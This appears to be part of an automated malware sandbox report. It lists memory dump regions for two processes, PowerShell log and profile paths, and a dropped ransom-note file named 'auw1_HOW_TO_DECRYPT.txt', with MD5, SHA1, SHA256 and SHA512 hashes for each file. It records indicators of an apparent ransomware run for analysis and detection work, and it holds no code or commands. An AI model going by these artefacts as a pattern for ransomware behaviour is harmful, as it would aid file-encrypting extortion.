memory/1692-189-0x00000000073C0000-0x00000000073DC000-memory.dmp

memory/1692-190-0x00000000079D0000-0x0000000007A1B000-memory.dmp

memory/1692-191-0x0000000007CD0000-0x0000000007D46000-memory.dmp

memory/1692-192-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/1692-200-0x0000000006CD0000-0x00000000072F8000-memory.dmp

memory/1692-201-0x0000000008B50000-0x0000000008B83000-memory.dmp

memory/1692-202-0x0000000008B50000-0x0000000008B83000-memory.dmp

memory/1692-203-0x0000000006B10000-0x0000000006B32000-memory.dmp

memory/1692-204-0x0000000007300000-0x0000000007366000-memory.dmp

memory/1692-205-0x0000000007450000-0x00000000074B6000-memory.dmp

memory/1692-206-0x00000000079D0000-0x0000000007A1B000-memory.dmp

memory/1692-207-0x0000000007CD0000-0x0000000007D46000-memory.dmp

memory/1692-208-0x0000000008B30000-0x0000000008B4E000-memory.dmp

memory/1692-213-0x0000000008E90000-0x0000000008F35000-memory.dmp

memory/1692-214-0x000000007EAA0000-0x000000007EAA1000-memory.dmp

memory/1692-215-0x0000000009050000-0x00000000090E4000-memory.dmp

memory/1692-282-0x0000000000EA3000-0x0000000000EA4000-memory.dmp

memory/1692-409-0x0000000006820000-0x000000000683A000-memory.dmp

memory/1692-414-0x0000000006820000-0x000000000683A000-memory.dmp

memory/1692-415-0x0000000006810000-0x0000000006818000-memory.dmp

memory/1692-420-0x0000000006810000-0x0000000006818000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

memory/1112-433-0x00000000049F0000-0x0000000004A26000-memory.dmp

memory/1112-434-0x0000000007540000-0x0000000007B68000-memory.dmp

memory/1112-435-0x0000000006F00000-0x0000000006F01000-memory.dmp

memory/1112-436-0x0000000006F02000-0x0000000006F03000-memory.dmp

memory/1112-437-0x0000000007CA0000-0x0000000007CC2000-memory.dmp

memory/1112-438-0x0000000007D40000-0x0000000007DA6000-memory.dmp

memory/1112-439-0x0000000007E80000-0x0000000007EE6000-memory.dmp

memory/1112-440-0x0000000007EF0000-0x0000000008240000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2cc2243fb8463e6c72e4652243bce562
SHA1 b71f572793c02c99af2adcb386c7415068f78bcf
SHA256 9cbeb9589fb0fffe24c41bbc36ee25c307f0cc985c1493a17c6f1350735022ef
SHA512 64188eef082312488cc8a8b1e71a292b20009777a966cc4ac5d07975c88103df771fc40b27f6c319d4370bbbdb356a0abb1ca2d4e3095eee518ff545ffe040b9

memory/1112-442-0x0000000007E50000-0x0000000007E6C000-memory.dmp

memory/1112-443-0x00000000087A0000-0x00000000087EB000-memory.dmp

memory/1112-444-0x0000000008590000-0x0000000008606000-memory.dmp

memory/1112-453-0x0000000007540000-0x0000000007B68000-memory.dmp

memory/1112-454-0x0000000009680000-0x00000000096B3000-memory.dmp

memory/1112-455-0x0000000009680000-0x00000000096B3000-memory.dmp

memory/1112-456-0x000000007EE60000-0x000000007EE61000-memory.dmp

memory/1112-457-0x0000000007CA0000-0x0000000007CC2000-memory.dmp

memory/1112-458-0x0000000007D40000-0x0000000007DA6000-memory.dmp

memory/1112-459-0x0000000007E80000-0x0000000007EE6000-memory.dmp

memory/1112-460-0x00000000087A0000-0x00000000087EB000-memory.dmp

memory/1112-461-0x0000000008590000-0x0000000008606000-memory.dmp

memory/1112-462-0x0000000009640000-0x000000000965E000-memory.dmp

memory/1112-467-0x00000000096C0000-0x0000000009765000-memory.dmp

memory/1112-468-0x0000000009990000-0x0000000009A24000-memory.dmp

memory/1112-469-0x0000000006F03000-0x0000000006F04000-memory.dmp

memory/1112-662-0x0000000009920000-0x000000000993A000-memory.dmp

memory/1112-667-0x0000000009920000-0x000000000993A000-memory.dmp

memory/1112-668-0x0000000009910000-0x0000000009918000-memory.dmp

memory/1112-673-0x0000000009910000-0x0000000009918000-memory.dmp

C:\Users\Admin\Desktop\auw1_HOW_TO_DECRYPT.txt

MD5 2820fcb11d7daa8ec77b1f331a1352b6
SHA1 16cc7a5cef90c634e5b7440cd1c16933b18bcec7
SHA256 7de74dbb2e345a415ea93c7f700cff4c97b0a2dbe65234593d96269148acbdf5
SHA512 3cd9504b4e29bdcaf36879eb3e1067827c70786e2d4c47f0be202d1791847533f5cfff5b3ce3a5817566575f07498de0af77c4bf84a2d7acb0705aa411278fc1